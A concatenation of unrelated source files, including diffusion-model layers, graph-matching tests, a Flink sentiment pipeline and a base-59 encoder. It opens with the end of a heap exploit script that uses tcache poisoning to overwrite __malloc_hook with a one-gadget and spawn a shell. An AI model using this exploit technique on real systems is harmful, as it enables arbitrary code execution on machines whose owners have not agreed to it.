# freeing chunk_1 and chunk_5 put them in the same bin in tcache
# even though they are pointing to the same address
delete_heap(0)
delete_heap(2)
# we can create a fake chunk before __malloc_hook with size of 0x7f
malloc_hook = libc_base + 0x3ebc30
fake_chunk = malloc_hook - 0x13
print 'fake chunk: {}'.format(hex(fake_chunk))
# table[4] => chunk_5 (0x71)
# we used tcache_poisoning here
# chunk_5 will be served from tcache and we will put the address of
# our fake chunk in the chunk_1's fd.
new_heap(0x68, p64(fake_chunk))
# table[5] => chunk_1 (0x71)
# this allocation serves chunk_1 and put fake chunk address in the tcache
new_heap(0x68, 'h' * 0x67)
'''
0x4f322 execve("/bin/sh", rsp+0x40, environ)
constraints:
[rsp+0x40] == NULL
'''
# table[6] => fake_chunk (0x7f)
# since fake_chunk is at the head of the list, this allocation returns it
# then, we overwrite __malloc_hook with one gadget
new_heap(0x68, 'i' * 0x13 + p64(libc_base + 0x4f322))
# this allocation triggers __malloc_hook and we have shell
new_heap(1, '', True)
p.interactive()
|
codeforces/acmsguru/112.py | Ashindustry007/competitive-programming | 506 | 12796206 | #!/usr/bin/env python3
# https://codeforces.com/problemsets/acmsguru/problem/99999/112
a,b=map(int,input().split())
print(pow(a,b)-pow(b,a))
|
mmgen/models/architectures/ddpm/modules.py | plutoyuxie/mmgeneration | 718 | 12796227 | <reponame>plutoyuxie/mmgeneration<gh_stars>100-1000
# Copyright (c) OpenMMLab. All rights reserved.
from copy import deepcopy
from functools import partial
import mmcv
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from mmcv.cnn import ACTIVATION_LAYERS
from mmcv.cnn.bricks import build_activation_layer, build_norm_layer
from mmcv.cnn.utils import constant_init
from mmgen.models.builder import MODULES, build_module
class EmbedSequential(nn.Sequential):
"""A sequential module that passes timestep embeddings to the children that
support it as an extra input.
Modified from
https://github.com/openai/improved-diffusion/blob/main/improved_diffusion/unet.py#L35
"""
def forward(self, x, y):
for layer in self:
if isinstance(layer, DenoisingResBlock):
x = layer(x, y)
else:
x = layer(x)
return x
@ACTIVATION_LAYERS.register_module()
class SiLU(nn.Module):
r"""Applies the Sigmoid Linear Unit (SiLU) function, element-wise.
The SiLU function is also known as the swish function.
Args:
input (bool, optional): Use inplace operation or not.
Defaults to `False`.
"""
def __init__(self, inplace=False):
super().__init__()
if torch.__version__ < '1.6.0' and inplace:
mmcv.print_log('Inplace version of \'SiLU\' is not supported for '
f'torch < 1.6.0, found \'{torch.version}\'.')
self.inplace = inplace
def forward(self, x):
"""Forward function for SiLU.
Args:
x (torch.Tensor): Input tensor.
Returns:
torch.Tensor: Tensor after activation.
"""
if torch.__version__ < '1.6.0':
return x * torch.sigmoid(x)
return F.silu(x, inplace=self.inplace)
@MODULES.register_module()
class MultiHeadAttention(nn.Module):
"""An attention block allows spatial position to attend to each other.
Originally ported from here, but adapted to the N-d case.
https://github.com/hojonathanho/diffusion/blob/1e0dceb3b3495bbe19116a5e1b3596cd0706c543/diffusion_tf/models/unet.py#L66. # noqa
Args:
in_channels (int): Channels of the input feature map.
num_heads (int, optional): Number of heads in the attention.
norm_cfg (dict, optional): Config for normalization layer. Default
to ``dict(type='GN', num_groups=32)``
"""
def __init__(self,
in_channels,
num_heads=1,
norm_cfg=dict(type='GN', num_groups=32)):
super().__init__()
self.num_heads = num_heads
_, self.norm = build_norm_layer(norm_cfg, in_channels)
self.qkv = nn.Conv1d(in_channels, in_channels * 3, 1)
self.proj = nn.Conv1d(in_channels, in_channels, 1)
self.init_weights()
@staticmethod
def QKVAttention(qkv):
channel = qkv.shape[1] // 3
q, k, v = torch.chunk(qkv, 3, dim=1)
scale = 1 / np.sqrt(np.sqrt(channel))
weight = torch.einsum('bct,bcs->bts', q * scale, k * scale)
weight = torch.softmax(weight.float(), dim=-1).type(weight.dtype)
weight = torch.einsum('bts,bcs->bct', weight, v)
return weight
def forward(self, x):
"""Forward function for multi head attention.
Args:
x (torch.Tensor): Input feature map.
Returns:
torch.Tensor: Feature map after attention.
"""
b, c, *spatial = x.shape
x = x.reshape(b, c, -1)
qkv = self.qkv(self.norm(x))
qkv = qkv.reshape(b * self.num_heads, -1, qkv.shape[2])
h = self.QKVAttention(qkv)
h = h.reshape(b, -1, h.shape[-1])
h = self.proj(h)
return (h + x).reshape(b, c, *spatial)
def init_weights(self):
constant_init(self.proj, 0)
@MODULES.register_module()
class TimeEmbedding(nn.Module):
"""Time embedding layer, reference to Two level embedding. First embedding
time by an embedding function, then feed to neural networks.
Args:
in_channels (int): The channel number of the input feature map.
embedding_channels (int): The channel number of the output embedding.
embedding_mode (str, optional): Embedding mode for the time embedding.
Defaults to 'sin'.
embedding_cfg (dict, optional): Config for time embedding.
Defaults to None.
act_cfg (dict, optional): Config for activation layer. Defaults to
``dict(type='SiLU', inplace=False)``.
"""
def __init__(self,
in_channels,
embedding_channels,
embedding_mode='sin',
embedding_cfg=None,
act_cfg=dict(type='SiLU', inplace=False)):
super().__init__()
self.blocks = nn.Sequential(
nn.Linear(in_channels, embedding_channels),
build_activation_layer(act_cfg),
nn.Linear(embedding_channels, embedding_channels))
# add `dim` to embedding config
embedding_cfg_ = dict(dim=in_channels)
if embedding_cfg is not None:
embedding_cfg_.update(embedding_cfg)
if embedding_mode.upper() == 'SIN':
self.embedding_fn = partial(self.sinusodial_embedding,
**embedding_cfg_)
else:
raise ValueError('Only support `SIN` for time embedding, '
f'but receive {embedding_mode}.')
@staticmethod
def sinusodial_embedding(timesteps, dim, max_period=10000):
"""Create sinusoidal timestep embeddings.
Args:
timesteps (torch.Tensor): Timestep to embedding. 1-D tensor shape
as ``[bz, ]``, one per batch element.
dim (int): The dimension of the embedding.
max_period (int, optional): Controls the minimum frequency of the
embeddings. Defaults to ``10000``.
Returns:
torch.Tensor: Embedding results shape as `[bz, dim]`.
"""
half = dim // 2
freqs = torch.exp(
-np.log(max_period) *
torch.arange(start=0, end=half, dtype=torch.float32) /
half).to(device=timesteps.device)
args = timesteps[:, None].float() * freqs[None]
embedding = torch.cat([torch.cos(args), torch.sin(args)], dim=-1)
if dim % 2:
embedding = torch.cat(
[embedding, torch.zeros_like(embedding[:, :1])], dim=-1)
return embedding
def forward(self, t):
"""Forward function for time embedding layer.
Args:
t (torch.Tensor): Input timesteps.
Returns:
torch.Tensor: Timesteps embedding.
"""
return self.blocks(self.embedding_fn(t))
@MODULES.register_module()
class DenoisingResBlock(nn.Module):
"""Resblock for the denoising network. If `in_channels` not equals to
`out_channels`, a learnable shortcut with conv layers will be added.
Args:
in_channels (int): Number of channels of the input feature map.
embedding_channels (int): Number of channels of the input embedding.
use_scale_shift_norm (bool): Whether use scale-shift-norm in
`NormWithEmbedding` layer.
dropout (float): Probability of the dropout layers.
out_channels (int, optional): Number of output channels of the
ResBlock. If not defined, the output channels will equal to the
`in_channels`. Defaults to `None`.
norm_cfg (dict, optional): The config for the normalization layers.
Defaults too ``dict(type='GN', num_groups=32)``.
act_cfg (dict, optional): The config for the activation layers.
Defaults to ``dict(type='SiLU', inplace=False)``.
shortcut_kernel_size (int, optional): The kernel size for the shortcut
conv. Defaults to ``1``.
"""
def __init__(self,
in_channels,
embedding_channels,
use_scale_shift_norm,
dropout,
out_channels=None,
norm_cfg=dict(type='GN', num_groups=32),
act_cfg=dict(type='SiLU', inplace=False),
shortcut_kernel_size=1):
super().__init__()
out_channels = in_channels if out_channels is None else out_channels
_norm_cfg = deepcopy(norm_cfg)
_, norm_1 = build_norm_layer(_norm_cfg, in_channels)
conv_1 = [
norm_1,
build_activation_layer(act_cfg),
nn.Conv2d(in_channels, out_channels, 3, padding=1)
]
self.conv_1 = nn.Sequential(*conv_1)
norm_with_embedding_cfg = dict(
in_channels=out_channels,
embedding_channels=embedding_channels,
use_scale_shift=use_scale_shift_norm,
norm_cfg=_norm_cfg)
self.norm_with_embedding = build_module(
dict(type='NormWithEmbedding'),
default_args=norm_with_embedding_cfg)
conv_2 = [
build_activation_layer(act_cfg),
nn.Dropout(dropout),
nn.Conv2d(out_channels, out_channels, 3, padding=1)
]
self.conv_2 = nn.Sequential(*conv_2)
assert shortcut_kernel_size in [
1, 3
], ('Only support `1` and `3` for `shortcut_kernel_size`, but '
f'receive {shortcut_kernel_size}.')
self.learnable_shortcut = out_channels != in_channels
if self.learnable_shortcut:
shortcut_padding = 1 if shortcut_kernel_size == 3 else 0
self.shortcut = nn.Conv2d(
in_channels,
out_channels,
shortcut_kernel_size,
padding=shortcut_padding)
self.init_weights()
def forward_shortcut(self, x):
if self.learnable_shortcut:
return self.shortcut(x)
return x
def forward(self, x, y):
"""Forward function.
Args:
x (torch.Tensor): Input feature map tensor.
y (torch.Tensor): Shared time embedding or shared label embedding.
Returns:
torch.Tensor : Output feature map tensor.
"""
shortcut = self.forward_shortcut(x)
x = self.conv_1(x)
x = self.norm_with_embedding(x, y)
x = self.conv_2(x)
return x + shortcut
def init_weights(self):
# apply zero init to last conv layer
constant_init(self.conv_2[-1], 0)
@MODULES.register_module()
class NormWithEmbedding(nn.Module):
"""Nornalization with embedding layer. If `use_scale_shift == True`,
embedding results will be chunked and used to re-shift and re-scale
normalization results. Otherwise, embedding results will directly add to
input of normalization layer.
Args:
in_channels (int): Number of channels of the input feature map.
embedding_channels (int) Number of channels of the input embedding.
norm_cfg (dict, optional): Config for the normalization operation.
Defaults to `dict(type='GN', num_groups=32)`.
act_cfg (dict, optional): Config for the activation layer. Defaults
to `dict(type='SiLU', inplace=False)`.
use_scale_shift (bool): If True, the output of Embedding layer will be
split to 'scale' and 'shift' and map the output of normalization
layer to ``out * (1 + scale) + shift``. Otherwise, the output of
Embedding layer will be added with the input before normalization
operation. Defaults to True.
"""
def __init__(self,
in_channels,
embedding_channels,
norm_cfg=dict(type='GN', num_groups=32),
act_cfg=dict(type='SiLU', inplace=False),
use_scale_shift=True):
super().__init__()
self.use_scale_shift = use_scale_shift
_, self.norm = build_norm_layer(norm_cfg, in_channels)
embedding_output = in_channels * 2 if use_scale_shift else in_channels
self.embedding_layer = nn.Sequential(
build_activation_layer(act_cfg),
nn.Linear(embedding_channels, embedding_output))
def forward(self, x, y):
"""Forward function.
Args:
x (torch.Tensor): Input feature map tensor.
y (torch.Tensor): Shared time embedding or shared label embedding.
Returns:
torch.Tensor : Output feature map tensor.
"""
embedding = self.embedding_layer(y)[:, :, None, None]
if self.use_scale_shift:
scale, shift = torch.chunk(embedding, 2, dim=1)
x = self.norm(x)
x = x * (1 + scale) + shift
else:
x = self.norm(x + embedding)
return x
@MODULES.register_module()
class DenoisingDownsample(nn.Module):
"""Downsampling operation used in the denoising network. Support average
pooling and convolution for downsample operation.
Args:
in_channels (int): Number of channels of the input feature map to be
downsampled.
with_conv (bool, optional): Whether use convolution operation for
downsampling. Defaults to `True`.
"""
def __init__(self, in_channels, with_conv=True):
super().__init__()
if with_conv:
self.downsample = nn.Conv2d(in_channels, in_channels, 3, 2, 1)
else:
self.downsample = nn.AvgPool2d(stride=2)
def forward(self, x):
"""Forward function for downsampling operation.
Args:
x (torch.Tensor): Feature map to downsample.
Returns:
torch.Tensor: Feature map after downsampling.
"""
return self.downsample(x)
@MODULES.register_module()
class DenoisingUpsample(nn.Module):
"""Upsampling operation used in the denoising network. Allows users to
apply an additional convolution layer after the nearest interpolation
operation.
Args:
in_channels (int): Number of channels of the input feature map to be
downsampled.
with_conv (bool, optional): Whether apply an additional convolution
layer after upsampling. Defaults to `True`.
"""
def __init__(self, in_channels, with_conv=True):
super().__init__()
if with_conv:
self.with_conv = True
self.conv = nn.Conv2d(in_channels, in_channels, 3, 1, 1)
def forward(self, x):
"""Forward function for upsampling operation.
Args:
x (torch.Tensor): Feature map to upsample.
Returns:
torch.Tensor: Feature map after upsampling.
"""
x = F.interpolate(x, scale_factor=2, mode='nearest')
if self.with_conv:
x = self.conv(x)
return x
|
kaldi/lm/__init__.py | mxmpl/pykaldi | 916 | 12796238 | from ._arpa_file_parser import ArpaParseOptions
from ._arpa_lm_compiler import *
from ._const_arpa_lm import *
from ._kaldi_rnnlm import *
__all__ = [name for name in dir()
if name[0] != '_'
and not name.endswith('Base')]
|
vdpwi/utils/preprocess.py | achyudh/castor | 132 | 12796244 | import argparse
import os
from scipy.special import erf
from scipy.stats import truncnorm
import numpy as np
import data
def build_vector_cache(glove_filename, vec_cache_filename, vocab):
print("Building vector cache...")
with open(glove_filename) as f, open(vec_cache_filename, "w") as f2:
for line in f:
tok, vec = line.split(" ", 1)
if tok in vocab:
vocab.remove(tok)
f2.write("{} {}".format(tok, vec))
def discrete_tnorm(a, b, tgt_loc, sigma=1, n_steps=100):
def phi(zeta):
return 1 / (np.sqrt(2 * np.pi)) * np.exp(-0.5 * zeta**2)
def Phi(x):
return 0.5 * (1 + erf(x / np.sqrt(2)))
def tgt_loc_update(x):
y1 = phi((a - x) / sigma)
y2 = phi((b - x) / sigma)
x1 = Phi((b - x) / sigma)
x2 = Phi((a - x) / sigma)
denom = x1 - x2 + 1E-4
return y1 / denom - y2 / denom
x = tgt_loc
direction = np.sign(tgt_loc - (b - a))
for _ in range(n_steps):
x = tgt_loc - sigma * tgt_loc_update(x)
tn = truncnorm((a - x) / sigma, (b - x) / sigma, loc=x, scale=sigma)
rrange = np.arange(a, b + 1)
pmf = tn.pdf(rrange)
pmf /= np.sum(pmf)
return pmf
def discrete_lerp(a, b, ground_truth):
pmf = np.zeros(b - a + 1)
c = int(np.ceil(ground_truth + 1E-8))
f = int(np.floor(ground_truth))
pmf[min(c - a, b - a)] = ground_truth - f
pmf[f - a] = c - ground_truth
return pmf
def smoothed_labels(truth, n_labels):
return discrete_lerp(1, n_labels, truth)
def preprocess(filename, output_name="sim_sparse.txt"):
print("Preprocessing {}...".format(filename))
with open(filename) as f:
values = [float(l.strip()) for l in f.readlines()]
values = [" ".join([str(l) for l in smoothed_labels(v, 5)]) for v in values]
with open(os.path.join(os.path.dirname(filename), output_name), "w") as f:
f.write("\n".join(values))
def add_vocab(tok_filename, vocab):
with open(tok_filename) as f:
for line in f:
vocab.update(line.strip().split())
def main():
base_conf = data.Configs.base_config()
sick_conf = data.Configs.sick_config()
sick_folder = sick_conf.sick_data
vocab = set()
for name in ("train", "dev", "test"):
preprocess(os.path.join(sick_folder, name, "sim.txt"))
add_vocab(os.path.join(sick_folder, name, "a.toks"), vocab)
add_vocab(os.path.join(sick_folder, name, "b.toks"), vocab)
build_vector_cache(base_conf.wordvecs_file, sick_conf.sick_cache, vocab)
if __name__ == "__main__":
main()
|
RecoLocalTracker/SubCollectionProducers/python/ClusterMultiplicityFilter_cfi.py | ckamtsikis/cmssw | 852 | 12796248 | <gh_stars>100-1000
import FWCore.ParameterSet.Config as cms
tifClusterFilter = cms.EDFilter("ClusterMultiplicityFilter",
MaxNumberOfClusters = cms.uint32(300),
ClusterCollection = cms.InputTag('siStripClusters')
)
|
networkit/test/test_matching_algorithms.py | angriman/network | 366 | 12796257 | #!/usr/bin/env python3
import random
import unittest
import networkit as nk
class TestMatchingAlgorithms(unittest.TestCase):
def generateRandomWeights(self, g):
if not g.isWeighted():
g = nk.graphtools.toWeighted(g)
for e in g.iterEdges():
g.setWeight(e[0], e[1], random.random())
return g
def setUp(self):
self.g = nk.readGraph("input/PGPgiantcompo.graph", nk.Format.METIS)
self.gw = self.generateRandomWeights(self.g)
def hasUnmatchedNeighbors(self, g, m):
for e in g.iterEdges():
if not m.isMatched(e[0]) and not m.isMatched(e[1]):
return True
return False
def testPathGrowingMatcher(self):
def runAlgo(g):
pgm = nk.matching.PathGrowingMatcher(self.g)
pgm.run()
m = pgm.getMatching()
runAlgo(self.g)
runAlgo(self.gw)
def testSuitorMatcher(self):
def doTest(g):
m1 = nk.matching.SuitorMatcher(g, False).run().getMatching()
nk.graphtools.sortEdgesByWeight(g, True)
self.assertTrue(m1.isProper(g))
self.assertFalse(self.hasUnmatchedNeighbors(g, m1))
m2 = nk.matching.SuitorMatcher(g, True).run().getMatching()
self.assertTrue(m2.isProper(g))
self.assertFalse(self.hasUnmatchedNeighbors(g, m2))
for u in g.iterNodes():
self.assertEqual(m1.mate(u), m2.mate(u))
doTest(self.g)
doTest(self.gw)
if __name__ == "__main__":
unittest.main()
|
scripts/examples/OpenMV/32-modbus/modbus_apriltag.py | jiskra/openmv | 1,761 | 12796287 | <gh_stars>1000+
import sensor, image
import time
from pyb import UART
from modbus import ModbusRTU
sensor.reset()
sensor.set_pixformat(sensor.GRAYSCALE)
sensor.set_framesize(sensor.QQVGA) # we run out of memory if the resolution is much bigger...
uart = UART(3,115200, parity=None, stop=2, timeout=1, timeout_char=4)
modbus = ModbusRTU(uart, register_num=9999)
sensor.skip_frames(time = 2000)
clock = time.clock()
while(True):
if modbus.any():
modbus.handle(debug=True)
else:
clock.tick()
img = sensor.snapshot()
tags = img.find_apriltags() # defaults to TAG36H11 without "families".
modbus.clear()
modbus.REGISTER[0] = len(tags)
if tags:
print(tags)
i = 1
for tag in tags:
img.draw_rectangle(tag.rect(), color = 127)
modbus.REGISTER[i] = tag.family()
i += 1
modbus.REGISTER[i] = tag.id()
i += 1
modbus.REGISTER[i] = tag.cx()
i += 1
modbus.REGISTER[i] = tag.cy()
i += 1
#print(modbus.REGISTER[0:15])
#print(clock.fps())
|
formats/ycd/__init__.py | Adobe12327/Sollumz | 131 | 12796316 | <filename>formats/ycd/__init__.py
if "bpy" in locals():
import importlib
importlib.reload(Animation)
importlib.reload(AnimSequence)
importlib.reload(Channel)
importlib.reload(Clip)
importlib.reload(ClipDictionary)
importlib.reload(utils)
else:
from . import Animation
from . import AnimSequence
from . import Channel
from . import Clip
from . import ClipDictionary
from . import utils
import bpy |
iepy/webui/corpus/migrations/0003_remove_dont_know_option.py | francolq/iepy | 813 | 12796326 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('corpus', '0002_data_migration_dont_know_skip_merge'),
]
operations = [
migrations.AlterField(
model_name='evidencelabel',
name='label',
preserve_default=True,
field=models.CharField(
default='SK',
null=True,
max_length=2,
choices=[
('YE', 'Yes, relation is present'),
('NO', 'No relation present'),
('NS', 'Evidence is nonsense'),
('SK', 'Skipped labeling of this evidence')
]
),
),
]
|
examples/image/plot_dataset_mtf.py | Pandinosaurus/pyts | 1,217 | 12796363 | """
====================================
Data set of Markov transition fields
====================================
A Markov transition field is an image obtained from a time series, representing
a field of transition probabilities for a discretized time series.
Different strategies can be used to bin time series.
It is implemented as :class:`pyts.image.MarkovTransitionField`.
In this example, we consider the training samples of the
`GunPoint dataset <http://timeseriesclassification.com/description.php?Dataset=GunPoint>`_,
consisting of 50 univariate time series of length 150.
The Markov transition field of each time series is independently computed and
the 50 Markov transition fields are plotted.
""" # noqa:E501
# Author: <NAME> <<EMAIL>>
# License: BSD-3-Clause
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1 import ImageGrid
from pyts.image import MarkovTransitionField
from pyts.datasets import load_gunpoint
# Load the GunPoint dataset
X, _, _, _ = load_gunpoint(return_X_y=True)
# Get the recurrence plots for all the time series
mtf = MarkovTransitionField(n_bins=8)
X_mtf = mtf.fit_transform(X)
# Plot the 50 Gramian angular fields
fig = plt.figure(figsize=(10, 5))
grid = ImageGrid(fig, 111, nrows_ncols=(5, 10), axes_pad=0.1, share_all=True,
cbar_mode='single')
for i, ax in enumerate(grid):
im = ax.imshow(X_mtf[i], cmap='rainbow', origin='lower', vmin=0., vmax=1.)
grid[0].get_yaxis().set_ticks([])
grid[0].get_xaxis().set_ticks([])
plt.colorbar(im, cax=grid.cbar_axes[0])
ax.cax.toggle_label(True)
fig.suptitle("Markov transition fields for the 50 time series in the "
"'GunPoint' dataset", y=0.92)
plt.show()
|
core/src/autogluon/core/searcher/bayesopt/tuning_algorithms/defaults.py | zhiqiangdon/autogluon | 4,462 | 12796388 | <gh_stars>1000+
from .bo_algorithm_components import LBFGSOptimizeAcquisition
from ..models.meanstd_acqfunc_impl import EIAcquisitionFunction
DEFAULT_ACQUISITION_FUNCTION = EIAcquisitionFunction
DEFAULT_LOCAL_OPTIMIZER_CLASS = LBFGSOptimizeAcquisition
DEFAULT_NUM_INITIAL_CANDIDATES = 250
DEFAULT_NUM_INITIAL_RANDOM_EVALUATIONS = 3
|
tensorflow/27.pyflink-kafka/notebooks/tensorflow_predict.py | huseinzol05/Gather-Tensorflow-Serving | 267 | 12796392 | from pyflink.datastream import StreamExecutionEnvironment, TimeCharacteristic
from pyflink.table import StreamTableEnvironment, DataTypes, EnvironmentSettings
from pyflink.table.descriptors import (
Schema,
Kafka,
Json,
Rowtime,
OldCsv,
FileSystem,
)
from pyflink.table.udf import udf
s_env = StreamExecutionEnvironment.get_execution_environment()
s_env.set_stream_time_characteristic(TimeCharacteristic.EventTime)
s_env.set_parallelism(1)
st_env = StreamTableEnvironment.create(
s_env,
environment_settings = EnvironmentSettings.new_instance()
.in_streaming_mode()
.use_blink_planner()
.build(),
)
X, Y, sess = None, None, None
@udf(result_type = DataTypes.STRING())
def predict(string):
global X, Y, sess
import tensorflow as tf
import json
import numpy as np
def load_graph(frozen_graph_filename):
with tf.gfile.GFile(frozen_graph_filename, 'rb') as f:
graph_def = tf.GraphDef()
graph_def.ParseFromString(f.read())
with tf.Graph().as_default() as graph:
tf.import_graph_def(graph_def)
return graph
if X is None or Y is None or sess is None:
g = load_graph('/notebooks/frozen_model.pb')
X = g.get_tensor_by_name('import/Placeholder:0')
Y = g.get_tensor_by_name('import/logits:0')
sess = tf.Session(graph = g)
label = ['negative', 'positive']
maxlen = 50
UNK = 3
with open('/notebooks/dictionary-test.json', 'r') as fopen:
dic = json.load(fopen)
sentences = [string]
x = np.zeros((len(sentences), maxlen))
for i, sentence in enumerate(sentences):
for no, k in enumerate(sentence.split()[:maxlen][::-1]):
x[i, -1 - no] = dic.get(k, UNK)
indices = np.argmax(sess.run(Y, feed_dict = {X: x}), axis = 1)
return label[indices[0]]
st_env.set_python_requirements('/notebooks/requirements.txt')
st_env.register_function('predict', predict)
st_env.connect(
Kafka()
.version('universal')
.topic('test')
.start_from_earliest()
.property('zookeeper.connect', 'zookeeper:2181')
.property('bootstrap.servers', 'kafka:9092')
).with_format(
Json()
.fail_on_missing_field(True)
.schema(
DataTypes.ROW(
[
DataTypes.FIELD('datetime', DataTypes.STRING()),
DataTypes.FIELD('text', DataTypes.STRING()),
]
)
)
).with_schema(
Schema()
.field('datetime', DataTypes.STRING())
.field('text', DataTypes.STRING())
).in_append_mode().register_table_source(
'source'
)
result_path = '/notebooks/output-tensorflow.csv'
t_env.connect(FileSystem().path(result_path)).with_format(
OldCsv()
.field_delimiter(',')
.field('datetime', DataTypes.STRING())
.field('sentence', DataTypes.STRING())
.field('label', DataTypes.STRING())
).with_schema(
Schema()
.field('datetime', DataTypes.STRING())
.field('sentence', DataTypes.STRING())
.field('label', DataTypes.STRING())
).in_append_mode().register_table_sink(
'sink'
)
st_env.from_path('source').select(
'datetime, sentence, predict(sentence)'
).insert_into('sink')
st_env.execute('predict')
|
docs/code/snippet_nmf_fro.py | askerdb/nimfa | 325 | 12796445 | import numpy as np
import nimfa
V = np.random.rand(40, 100)
nmf = nimfa.Nmf(V, seed="nndsvd", rank=10, max_iter=12, update='euclidean',
objective='fro')
nmf_fit = nmf()
|
contrib/python/cuuid/base_x.py | Kronuz/Xapiand | 370 | 12796455 | <gh_stars>100-1000
#
# Copyright (C) 2015-2018 Dubalu LLC. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
"""
BaseX encoding
"""
__version__ = '0.0.1'
class BaseX(object):
def __init__(self, alphabet, translate):
self.alphabet = alphabet
self.translate = translate
self.base = len(self.alphabet)
self.decoder = [self.base] * 256
for i, a in enumerate(self.alphabet):
o = ord(a)
self.decoder[o] = i
x = -1
for a in self.translate:
o = ord(a)
i = self.decoder[o]
if i < self.base:
x = i
else:
self.decoder[o] = x
def encode_int(self, i, default_one=True):
"""Encode an integer using BaseX"""
if not i and default_one:
return self.alphabet[0]
string = ""
sum_chk = 0
while i:
i, idx = divmod(i, self.base)
string = self.alphabet[idx] + string
sum_chk += idx
sumsz = len(string)
sum_chk += sumsz + sumsz / self.base
return string, sum_chk % self.base
def encode(self, v):
"""Encode a string using BaseX"""
if not isinstance(v, bytes):
raise TypeError("a bytes-like object is required, not '%s'" % type(v).__name__)
p, acc = 1, 0
for c in map(ord, reversed(v)):
acc += p * c
p = p << 8
result, sum_chk = self.encode_int(acc, default_one=False)
sum_chk = (self.base - (sum_chk % self.base)) % self.base
return result + self.alphabet[sum_chk]
def decode_int(self, v):
"""Decode a BaseX encoded string as an integer"""
if not isinstance(v, str):
v = v.decode('ascii')
decimal = 0
sum_chk = 0
sumsz = 0
for char in v:
o = ord(char)
i = self.decoder[o]
if i < 0:
continue
if i >= self.base:
raise ValueError("Invalid character")
decimal = decimal * self.base + i
sum_chk += i
sumsz += 1
sum_chk += sumsz + sumsz / self.base
return decimal, sum_chk % self.base
def decode(self, v):
"""Decode a BaseX encoded string"""
if not isinstance(v, str):
v = v.decode('ascii')
while True:
chk = self.decoder[ord(v[-1:])]
v = v[:-1]
if chk < 0:
continue
if chk >= self.base:
raise ValueError("Invalid character")
break
acc, sum_chk = self.decode_int(v)
sum_chk += chk
if sum_chk % self.base:
raise ValueError("Invalid checksum")
result = []
while acc:
result.append(acc & 0xff)
acc >>= 8
return ''.join(map(chr, reversed(result)))
def chksum(self, v):
"""Get checksum character for BaseX encoded string"""
if not isinstance(v, str):
v = v.decode('ascii')
acc, sum_chk = self.decode_int(v)
sum_chk = (self.base - (sum_chk % self.base)) % self.base
return self.alphabet[sum_chk]
b59 = BaseX('zGLUAC2EwdDRrkWBatmscxyYlg6jhP7K53TibenZpMVuvoO9H4XSQq8FfJN', '~l1IO0')
b59decode = b59.decode
b59encode = b59.encode
def main():
"""BaseX encode or decode FILE, or standard input, to standard output."""
import sys
import argparse
stdout = sys.stdout
parser = argparse.ArgumentParser(description=main.__doc__)
parser.add_argument(
'file',
metavar='FILE',
nargs='?',
type=argparse.FileType('r'),
default='-')
parser.add_argument(
'-d', '--decode',
action='store_true',
help='decode data')
parser.add_argument(
'-c', '--check',
action='store_true',
help='append a checksum before encoding')
args = parser.parse_args()
fun = {
(False, False): b59encode,
(True, False): b59decode,
}[(args.decode, args.check)]
data = args.file.read().rstrip(b'\n')
try:
result = fun(data)
except Exception as e:
sys.exit(e)
if not isinstance(result, bytes):
result = result.encode('ascii')
stdout.write(result)
if __name__ == '__main__':
main()
|
d3status/tasks/email_tasks.py | nicozhang/startUp | 124 | 12796486 | <gh_stars>100-1000
# -*- coding: utf-8 -*-
#
# Copyright (c) 2012 feilong.me. All rights reserved.
#
# @author: <NAME> <<EMAIL>>
# Created on Jun 30, 2012
#
from celery.task import task
from d3status.mail import send_email
@task
def send_email_task(fr, to, subject, body, html=None, attachments=[]):
send_email(fr, to, subject, body, html, attachments)
|
clist/migrations/0012_auto_20191123_0953.py | horacexd/clist | 166 | 12796499 | <gh_stars>100-1000
# Generated by Django 2.1.7 on 2019-11-23 09:53
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('clist', '0011_auto_20190818_1125'),
]
operations = [
migrations.AddIndex(
model_name='contest',
index=models.Index(fields=['start_time'], name='clist_conte_start_t_9eec7a_idx'),
),
migrations.AddIndex(
model_name='contest',
index=models.Index(fields=['end_time'], name='clist_conte_end_tim_341782_idx'),
),
]
|
dltk/core/residual_unit.py | themantalope/DLTK | 1,397 | 12796516 | <reponame>themantalope/DLTK<filename>dltk/core/residual_unit.py
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import tensorflow as tf
import numpy as np
def vanilla_residual_unit_3d(inputs,
out_filters,
kernel_size=(3, 3, 3),
strides=(1, 1, 1),
mode=tf.estimator.ModeKeys.EVAL,
use_bias=False,
activation=tf.nn.relu6,
kernel_initializer=tf.initializers.variance_scaling(distribution='uniform'),
bias_initializer=tf.zeros_initializer(),
kernel_regularizer=None,
bias_regularizer=None):
"""Implementation of a 3D residual unit according to [1]. This
implementation supports strided convolutions and automatically
handles different input and output filters.
[1] <NAME> et al. Identity Mappings in Deep Residual Networks. ECCV 2016.
Args:
inputs (tf.Tensor): Input tensor to the residual unit. Is required to
have a rank of 5 (i.e. [batch, x, y, z, channels]).
out_filters (int): Number of convolutional filters used in
the sub units.
kernel_size (tuple, optional): Size of the convoltional kernels
used in the sub units
strides (tuple, optional): Convolution strides in (x,y,z) of sub
unit 0. Allows downsampling of the input tensor via strides
convolutions.
mode (str, optional): One of the tf.estimator.ModeKeys: TRAIN, EVAL or
PREDICT
activation (optional): A function to use as activation function.
use_bias (bool, optional): Train a bias with each convolution.
kernel_initializer (TYPE, optional): Initialisation of convolution kernels
